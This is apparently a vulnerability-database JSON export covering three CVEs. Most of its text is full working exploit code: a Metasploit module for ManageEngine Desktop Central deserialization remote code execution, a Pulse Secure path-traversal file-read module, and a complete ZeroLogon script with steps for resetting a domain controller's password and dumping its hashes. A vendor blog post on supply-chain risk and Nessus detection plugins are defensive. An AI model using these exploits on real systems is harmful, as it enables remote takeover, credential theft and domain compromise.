on January 20, 2020. In continuation of that, \nthe complete fix for the remote code execution vulnerability is now \navailable in build 10.0.479.\" \n}, \n'Author' => [ \n'mr_me', # Discovery and exploit \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-10189'], \n['URL', 'https://srcincite.io/advisories/src-2020-0011/'], \n['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'], \n['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'], \n['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html'] \n], \n'DisclosureDate' => '2020-03-05', # 0day release \n'License' => MSF_LICENSE, \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n['Windows Command', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n], \n['Windows Dropper', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper \n], \n['PowerShell Stager', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n] \n], \n'DefaultTarget' => 2, \n'DefaultOptions' => { \n'RPORT' => 8383, \n'SSL' => true, \n'WfsDelay' => 60 # It can take a little while to trigger \n}, \n'CmdStagerFlavor' => 'certutil', # This works without issue \n'Notes' => { \n'PatchedVersion' => Gem::Version.new('100474'), \n'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page? \n'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'configurations.do') \n) \n \nunless res \nreturn CheckCode::Unknown('Target is not responding to check') \nend \n \nunless res.code == 200 && res.body.include?('ManageEngine Desktop Central') \nreturn CheckCode::Unknown('Target is not running Desktop Central') \nend \n \nversion = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text \n \nunless version \nreturn CheckCode::Detected('Could not detect Desktop Central version') \nend \n \nvprint_status(\"Detected Desktop Central version #{version}\") \n \nif Gem::Version.new(version) < notes['PatchedVersion'] \nreturn CheckCode::Appears(\"#{version} is an exploitable version\") \nend \n \nCheckCode::Safe(\"#{version} is not an exploitable version\") \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# XXX: An executable is required to run arbitrary commands \ncmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper \n \nvprint_status(\"Serializing command: #{cmd}\") \n \n# I identified mr_me's binary blob as the CommonsBeanutils1 payload :) \nserialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload( \n'CommonsBeanutils1', \ncmd \n) \n \n# XXX: Patch in expected serialVersionUID \nserialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\" \n \n# Rock 'n' roll! \nupload_serialized_payload(serialized_payload) \ndeserialize_payload \nend \n \ndef upload_serialized_payload(serialized_payload) \nprint_status('Uploading serialized payload') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/mdm/client/v1/mdmLogUploader'), \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart', \n'filename' => 'logger.zip' \n}, \n'data' => serialized_payload \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not upload serialized payload') \nend \n \nprint_good('Successfully uploaded serialized payload') \n \n# C:\\Program Files\\DesktopCentral_Server\\bin \nregister_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip') \nend \n \ndef deserialize_payload \nprint_status('Deserializing payload') \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'cewolf/'), \n'vars_get' => {'img' => '\\\\logger.zip'} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Could not deserialize payload') \nend \n \nprint_good('Successfully deserialized payload') \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156730/desktopcentral_deserialization.rb.txt"}, {"lastseen": "2019-08-22T05:38:44", "description": "", "cvss3": {}, "published": "2019-08-21T00:00:00", "type": "packetstorm", "title": "Pulse Secure SSL VPN 8.1R15.1 / 8.2 / 8.3 / 9.0 Arbitrary File Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "PACKETSTORM:154176", "href": "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html", "sourceData": "`# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) \n# Google Dork: inurl:/dana-na/ filetype:cgi \n# Date: 8/20/2019 \n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera \n# Vendor Homepage: https://pulsesecure.net \n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n# Tested on: Linux \n# CVE : CVE-2019-11510 \nrequire 'msf/core' \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Post::File \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Pulse Secure - System file leak', \n'Description' => %q{ \nPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. \nThis exploit reads /etc/passwd as a proof of concept \nThis vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n}, \n'References' => \n[ \n[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] \n], \n'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'RPORT' => 443, \n'SSL' => true \n}, \n)) \n \nend \n \n \ndef run() \nprint_good(\"Checking target...\") \nres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) \n \nif res && res.code == 200 \nprint_good(\"Target is Vulnerable!\") \ndata = res.body \ncurrent_host = datastore['RHOST'] \nfilename = \"msf_sslwebsession_\"+current_host+\".bin\" \nFile.delete(filename) if File.exist?(filename) \nfile_local_write(filename, data) \nprint_good(\"Parsing file.......\") \nparse() \nelse \nif(res && res.code == 404) \nprint_error(\"Target not Vulnerable\") \nelse \nprint_error(\"Ooof, try again...\") \nend \nend \nend \ndef parse() \ncurrent_host = datastore['RHOST'] \n \nfileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\") \nwords = 0 \nwhile (line = fileObj.gets) \nprintable_data = line.gsub(/[^[:print:]]/, '.') \narray_data = printable_data.scan(/.{1,60}/m) \nfor ar in array_data \nif ar != \"............................................................\" \nprint_good(ar) \nend \nend \n#print_good(printable_data) \n \nend \nfileObj.close \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154176/pulsesecure-disclose.rb.txt"}, {"lastseen": "2020-11-18T23:15:12", "description": "", "cvss3": {}, "published": "2020-11-18T00:00:00", "type": "packetstorm", "title": "Zerologon Netlogon Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-18T00:00:00", "id": "PACKETSTORM:160127", "href": "https://packetstormsecurity.com/files/160127/Zerologon-Netlogon-Privilege-Escalation.html", "sourceData": "`# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege \n# Date: 2020-10-04 \n# Exploit Author: West Shepherd \n# Vendor Homepage: https://www.microsoft.com \n# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2 \n# Tested on: Microsoft Windows Server 2016 Standard x64 \n# CVE : CVE-2020-1472 \n# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code \n# Sources: https://www.secura.com/pathtoimg.php?id=2055 \n# Requirements: python3 and impacket 0.9.21+ (tested using this version) \n#!/usr/bin/env python3 \nimport hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs \nfrom binascii import hexlify, unhexlify \nfrom subprocess import check_call \nfrom impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED \nfrom impacket.dcerpc.v5 import nrpc, epm, transport \nfrom impacket import crypto, version \nfrom impacket.examples import logger \nfrom Cryptodome.Cipher import AES \nfrom struct import pack, unpack \nfrom impacket.dcerpc.v5.rpcrt import DCERPCException \n \n \nclass Exploit: \ndef __init__( \nself, \nname='', \naddress='', \nattempts=2000, \npassword='' \n): \nname = name.rstrip('$') \nself.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\\ \n.ServerSecureChannel \nself.authenticator = self.getAuthenticator(stamp=0) \nself.clearNewPasswordBlob = b'\\x00' * 516 \nself.primaryName = ('\\\\\\\\%s' % name) + '\\x00' \nself.accountName = ('%s$' % name) + '\\x00' \nself.computerName = name + '\\x00' \nself.clientCredential = b'\\x00' * 8 \nself.clientChallenge = b'\\x00' * 8 \nself.negotiateFlags = 0x212fffff \nself.address = address \nself.max = attempts \nself.dce = None \nself.sessionKey = None \nself.clientStoredCredential = None \nself.password = password \n \ndef encodePassword(self, password): \nif isinstance(password, str): \npassword = password.encode('utf-8') \nreturn b'\\x00' * (512 - len(password))\\ \n+ password \\ \n+ pack('<L', len(password)) \n \ndef getAuthenticator(self, creds=b'\\x00' * 8, stamp=10): \nauthenticator = nrpc.NETLOGON_AUTHENTICATOR() \nauthenticator['Credential'] = creds \nauthenticator['Timestamp'] = stamp \nreturn authenticator \n \ndef serverReqChallenge(self): \ntry: \nbinding = epm.hept_map( \nself.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp' \n) \nself.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc() \nself.dce.connect() \nself.dce.bind(nrpc.MSRPC_UUID_NRPC) \nreturn nrpc.hNetrServerReqChallenge( \nself.dce, \nself.primaryName, \nself.computerName, \nself.clientChallenge \n) \nexcept BaseException as ex: \nself.logError(ex) \n \ndef serverAuthenticate(self): \ntry: \nauth = nrpc.hNetrServerAuthenticate3( \nself.dce, \nself.primaryName, \nself.accountName, \nself.secureChannelType, \nself.computerName, \nself.clientCredential, \nself.negotiateFlags \n) \nassert auth['ErrorCode'] == 0 \nself.logInfo('successfully authenticated') \nreturn True \nexcept nrpc.DCERPCSessionError as ex: \nself.dce = None \nif ex.get_error_code() == 0xc0000022: \nreturn None \nelse: \nself.logFail(ex.get_error_code()) \nexcept BaseException as ex: \nself.dce = None \nself.logFail(ex) \nself.dce = None \n \ndef serverPasswordSet(self): \ntry: \nreturn nrpc.hNetrServerPasswordSet2( \nself.dce, \nself.primaryName, \nself.accountName, \nself.secureChannelType, \nself.computerName, \nself.authenticator, \nself.clearNewPasswordBlob \n) \nexcept BaseException as ex: \nself.logError(ex) \n \ndef authenticate(self): \nself.logInfo( \n'checking target, attempting to authenticate %d max \nattempts' % self.max \n) \nfor attempt in range(0, self.max): \nself.logInfo('attempt %d' % attempt) \nself.serverReqChallenge() \nself.serverAuthenticate() \nif self.dce is not None: \nbreak \nif self.dce: \nreturn True \nelse: \nself.logError('failed to authenticate') \n \ndef exploit(self): \nself.logInfo('attempting password reset') \nreset = self.serverPasswordSet() \nif reset['ErrorCode'] == 0: \nself.logInfo('successfully reset password') \nelse: \nself.logError('failed to reset password') \nreturn self \n \ndef ComputeNetlogonCredentialAES(self, challenge): \nreturn nrpc.ComputeNetlogonCredentialAES( \nchallenge, \nself.sessionKey \n) \n \ndef logInfo(self, message): \nsys.stdout.write(\"[+] %s\\n\" % str(message)) \nreturn self \n \ndef logError(self, message): \nsys.stderr.write(\"[-] error %s\\n\" % str(message)) \n \ndef logFail(self, message): \nsys.stderr.write(\"[!] failure %s\\n\" % str(message)) \nsys.exit(2) \n \ndef restore(self): \nself.logInfo('attempting to restore password') \nself.clientChallenge = b'12345678' \ntry: \nself.primaryName = NULL \nchallenge = self.serverReqChallenge() \nself.sessionKey = nrpc.ComputeSessionKeyAES( \n'', self.clientChallenge, challenge['ServerChallenge'] \n) \nself.clientCredential = self.ComputeNetlogonCredentialAES( \nself.clientChallenge \n) \ntry: \nself.serverAuthenticate() \nexcept Exception as e: \nif str(e).find('STATUS_DOWNGRADE_DETECTED') < 0: \nraise \nself.logInfo('restoring password') \nself.clientStoredCredential = pack('<Q', unpack('<Q', \nself.clientCredential)[0] + 10) \nself.authenticator = self.getAuthenticator( \n \ncreds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential) \n) \nself.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES( \nself.encodePassword(self.password) \n) \nreset = self.serverPasswordSet() \nif reset['ErrorCode'] == 0: \nself.logInfo('successfully restored password') \nelse: \nself.logError('failed to restore password') \nexcept Exception as ex: \nself.logError(ex) \nreturn self \n \n \nif __name__ == '__main__': \ninfo = \"\"\" \nNOTE - Exploitation will break the DC until restored, recommended guidelines: \n \n1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN: \ncve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP> \n \n2. Exploit the DC - this will break the DC until restored: \ncve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP> \n \n3. Dump the DC - for the DA hashes, this will not contain the \nmachine hex-pass: \nsecretsdump.py -just-dc -no-pass <NETBIOS NAME>\\$@<IP> \n \n4. Dump the DC again - use the DA hash to get the machines hex-pass: \nsecretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP> \n \n5. Restore target - this fixes the DC: \ncve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP> \n-hex <HEXPASS> \n\"\"\" \nparser = argparse.ArgumentParser( \ndescription='CVE-2020-1472 ZeroLogon Exploit - Netlogon \nElevation of Privilege', \nadd_help=True \n) \ntry: \nparser.add_argument('-do', default='check', action='store', \nhelp='What to do (default check): \n[check|restore|exploit]') \nparser.add_argument('-target', action='store', \nhelp='NETBIOS name of target DC (not the FQDN)') \nparser.add_argument('-ip', action='store', \nhelp='IP address of target DC') \nparser.add_argument('-password', default='', action='store', \nhelp='The plaintext password to use to \nreset the DC') \nparser.add_argument('-hex', default='', action='store', \nhelp='The hex password to use to restore \nthe DC (recommended)') \nparser.add_argument('-max', default=2000, action='store', \nhelp='Max attempts to authenticate with \nthe DC (usually ~300 or less)') \n \nif len(sys.argv) < 3: \nparser.print_help() \nprint(info) \nsys.exit(1) \noptions = parser.parse_args() \n \nif options.do.lower() == 'check': \nExploit( \nname=options.target, \naddress=options.ip, \nattempts=int(options.max) \n).authenticate() \nelif options.do.lower() == 'exploit': \nexp = Exploit( \nname=options.target, \naddress=options.ip, \nattempts=int(options.max) \n) \nif exp.authenticate(): \nexp.exploit() \nelif options.do.lower() == 'restore': \nif options.hex != '' and options.password == '': \noptions.password = unhexlify(options.hex) \nif options.password != '': \nexp = Exploit( \nname=options.target, \naddress=options.ip, \npassword=options.password \n).restore() \nelse: \nparser.print_help() \n \nexcept Exception as error: \nsys.stderr.write('[-] error in main %s\\n' % str(error)) \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160127/zerologon-poc.txt"}], "impervablog": [{"lastseen": "2021-04-22T20:29:34", "description": "In [Part 1](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-1-vendor-compromise/>) of this series, we explained how and why our software supply chain transfers an extraordinary amount of risk downstream to the organizations and users that trust and depend on it. We also presented evidence suggesting that 2021 may well be the year of the [Software Supply Chain attack](<https://www.imperva.com/learn/application-security/supply-chain-attack/>).\n\nLast time we described the most sophisticated of the supply chain attack methods, a [Vendor Compromise](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-1-vendor-compromise/>). In this post, we cover the exploitation of third-party applications.\n\n### Exploitation of Third Party Applications\n\nAttacks targeting &quot;[zero-days](<https://www.imperva.com/learn/application-security/zero-day-exploit/>),&quot; or unpatched security bugs, in commonly used third-party applications are another example of the risks we assume from our software supply chain.\n\nCreating software is a challenging process. Often, incomplete requirements, incorrect assumptions, and time-to-market pressures result in the delivery of less-than-perfect software. Generally speaking, software developers do a good job of eliminating software bugs that cause the program to fail in catastrophic or obvious ways. Unfortunately, security bugs don\u2019t typically cause catastrophic system failures. They simply allow a bad actor to make the software do things it wasn\u2019t intended to do like steal other users\u2019 credentials or read the entire contents of a database.\n\nThe [recent attacks on the Microsoft Exchange Server](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>) are just the latest examples of this type of software supply chain attack. In this case, bugs in Exchange Server allowed attackers to read emails and install a web shell. A web shell is typically an additional web page that the attacker uploads to a website. If the attacker can modify a web page on the server, the web shell may be embedded in an existing page. The additional or modified page contains code that allows the attacker to run arbitrary Operating System commands on the webserver, read files in the filesystem, install malware, etc. A web shell offers capabilities similar to a backdoor without having to establish an additional network connection to the webserver.\n\nCompounding the problem, the rapid-fire ability of bad actors to take advantage of software vulnerability disclosures and our own justifiably cautious patch processes create an asymmetry, with predictable results. It\u2019s rare that an organization will be able to deploy a vendor patch the moment it is made available across all of the necessary locations. Employing a [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) to reduce the gap is a common strategy. Even the best WAFs require time to adapt, however, either with a new signature update (that must be developed, tested, and deployed) or with an adjustment to a machine learning model, or manual acknowledgment that an anomaly has been detected and should be blocked in the future. Additionally, these \u201cvirtual patches\u201d must be tested in each organizations\u2019 environment prior to deployment to ensure they don\u2019t cause unwanted side effects.\n\nThe race to mitigate zero-day attacks through traditional means is increasingly difficult to win. For example, a Zoho ManageEngine Desktop Server zero-day vulnerability [was broadly exploited within days](<https://www.tenable.com/blog/cve-2020-10189-deserialization-vulnerability-in-zoho-manageengine-desktop-central-10-patched>) of its public disclosure.\n\n### Imperva RASP\n\nImperva [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) offers a compelling way forward. Delivered as a lightweight software plugin, RASP attaches to virtually any type of application whether a third party, open-source or bespoke. Tightly coupled with the application and requiring no external connectivity, RASP protections are consistently applied regardless of where the application is deployed today or in the future. Using a positive security approach, RASP mitigates risk from supply chain attacks by neutralizing malicious software activity including unauthorized network calls, file system access, and execution of commands on the underlying host operating system.\n\nPerhaps this is why the National Institute of Standards and Technology recommends the use of RASP in Special Publication 800-53, section SI-7(17), [Security and Privacy Controls for Information Systems and Organizations](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf>)?\n\nSee [Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) for yourself.\n\nThe post [5 Ways Your Software Supply Chain is Out to Get You, Part 2: Exploit Third Party Applications](<https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-22T12:28:49", "type": "impervablog", "title": "5 Ways Your Software Supply Chain is Out to Get You, Part 2: Exploit Third Party Applications", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-04-22T12:28:49", "id": "IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD", "href": "https://www.imperva.com/blog/5-ways-your-software-supply-chain-is-out-to-get-you-part-2-exploit-third-party-applications/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:57:34", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479. It is, therefore, affected by a remote code execution vulnerability.", "cvss3": {}, "published": "2020-03-19T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "href": "https://www.tenable.com/plugins/nessus/134677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134677);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2020-10189\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0026\");\n\n script_name(english:\"ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote\nhost is version 10 prior to build 100479. It is, therefore, affected by\na remote code execution vulnerability.\");\n # https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b517c025\");\n # https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9944baef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central version 10 build 100479 or\nlater. Alternatively, apply the manual, vendor-supplied workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-10189\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine Desktop Central Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/19\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8020, 8383, 8040);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# Cannot know if manual workaround is in place.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"ManageEngine Desktop Central\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:8020);\n\ninstall = get_single_install(\n app_name : appname,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\nbuild = install[\"build\"];\nismsp = install[\"MSP\"];\nrep_version = version;\n\ninstall_url = build_url(port:port, qs:dir);\n\nif (ismsp) appname += \" MSP\";\n\nif (build == UNKNOWN_VER)\n exit(0, \"The build number of \"+appname+\" version \" +rep_version+ \" listening at \" +install_url+ \" could not be determined.\");\nelse\n rep_version += \" Build \" + build;\n\nbuild = int(build);\nif (version =~ \"^10(\\.|$)\" && build < 100479)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + rep_version +\n '\\n Fixed version : 10 Build 100479' +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, install_url, rep_version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-10T14:44:59", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479.\nIt is, therefore, affected by a remote code execution vulnerability.", "cvss3": {}, "published": "2020-04-10T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2023-06-08T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "href": "https://www.tenable.com/plugins/nessus/135293", "sourceData": "Binary data manageengine_desktop_central_cve-2020-10189.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:28:08", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to 8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file read vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by requesting a specially crafted URI, to read arbitrary files and disclose sensitive information.", "cvss3": {}, "published": "2019-08-16T00:00:00", "type": "nessus", "title": "Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:pulsesecure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "href": "https://www.tenable.com/plugins/nessus/127908", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127908);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2019-11510\");\n script_bugtraq_id(108073);\n script_xref(name:\"IAVA\", value:\"2019-A-0309-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/04/23\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0006\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0122\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0656\");\n\n script_name(english:\"Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an arbitrary file read vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to \n8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file \nread vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by \nrequesting a specially crafted URI, to read arbitrary files and disclose sensitive information.\");\n # https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d23f9165\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.1R15.1, 